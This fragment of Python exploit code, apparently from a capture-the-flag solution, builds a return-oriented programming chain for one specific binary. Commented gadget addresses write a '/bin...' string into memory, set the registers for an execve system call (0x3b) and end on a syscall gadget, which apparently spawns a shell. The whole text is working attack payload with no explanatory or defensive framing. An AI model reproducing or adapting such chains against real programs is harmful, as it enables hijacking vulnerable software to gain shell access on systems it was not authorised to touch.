payload = p64(0x40b1f6)
#0x40b1f6: pop rbx ; pop rbp ; ret
payload += p64(0x6e69622f)+p64(0x42a0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40b1f6)
# 0x40b1f6: pop rbx ; pop rbp ; ret
payload += p64(0x68662f)+p64(0x42a0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x409aaf)
# 0x0000000000409aaf: pop rsi; ret; 
payload += p64(0x0)+p64(0x413b25)
# 0x0000000000413b25: pop rdx; ret; 
payload += p64(0x0)+p64(0x4096a3)
# 0x00000000004096a3: pop r12; ret; 
payload += p64(0x42a070)+p64(0x409969)
# 0x0000000000409969: pop rbx; ret; 
payload += p64(0x409969)+p64(0x40fa79)
# 0x000000000040fa79: mov eax, ebx; pop rbx; ret; 
payload += p64(0x0)+p64(0x409a11)
# 0x0000000000409a11: mov rdi, r12; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp rax; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x0000000000409969: pop rbx; ret; 
payload += p64(0x3b)+p64(0x40fa79)
# 0x000000000040fa79: mov eax, ebx; pop rbx; ret; 
payload += p64(0x0)+p64(0x41777c)
# 0x000000000041777c: syscall; 
payload += b''
